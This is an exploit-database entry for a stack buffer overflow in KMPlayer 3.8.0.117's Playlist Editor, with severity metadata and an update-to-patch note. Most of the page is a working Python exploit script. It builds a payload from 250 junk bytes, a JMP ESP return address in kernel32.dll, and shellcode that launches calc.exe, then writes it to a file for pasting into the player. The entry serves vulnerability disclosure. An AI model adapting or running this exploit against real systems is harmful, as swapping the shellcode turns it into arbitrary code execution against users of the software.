KMPlayer 3.8.0.117 Buffer Overflow

vendor:

KMPlayer

by:

metacom

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: KMPlayer

Affected Version From: 3.8.0.117

Affected Version To: 3.8.0.117

Patch Exists: YES

Related CWE: N/A

CPE: KMPlayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2020

KMPlayer 3.8.0.117 Buffer Overflow

KMPlayer 3.8.0.117 is vulnerable to a buffer overflow vulnerability. The vulnerability is triggered when a specially crafted playlist is opened in the KMPlayer Playlist Editor. This causes a stack-based buffer overflow, which allows an attacker to execute arbitrary code. The exploit code contains 250 bytes of junk data followed by a return address pointing to the JMP ESP instruction in kernel32.dll. The exploit code also contains a shellcode that executes calc.exe.

Mitigation:

Update to the latest version of KMPlayer.

Source

Exploit-DB raw data:

#!/usr/bin/python
# KMPlayer 3.8.0.117 Buffer Overflow
# Author: metacom
# Tested on: Windows Xp pro-sp3 En
# Download link :http://www.chip.de/downloads/KMPlayer_33859258.html
# Version: 3.8.0.117 Kmp Plus
# Howto / Notes:
# Run KMPlayer Playlist Editor > New Album and paste Exploit Code
import struct
def little_endian(address):
  return struct.pack("<L",address)
  

junk = "\x41" * 250
eip = little_endian(0x7C86467B)   #7C86467B   FFE4  JMP ESP  kernel32.dll        

shellcode=(
        "\x31\xC9"                #// xor ecx,ecx        
        "\x51"                    #// push ecx        
        "\x68\x63\x61\x6C\x63"    #// push 0x636c6163        
        "\x54"                    #// push dword ptr esp        
        "\xB8\xC7\x93\xC2\x77"    #// mov eax,0x77c293c7        
        "\xFF\xD0"                #// call eax  
		)

exploit = junk + eip + shellcode
try:
    rst= open("crash.txt",'w')
    rst.write(exploit)
    rst.close()
except:
    print "Error"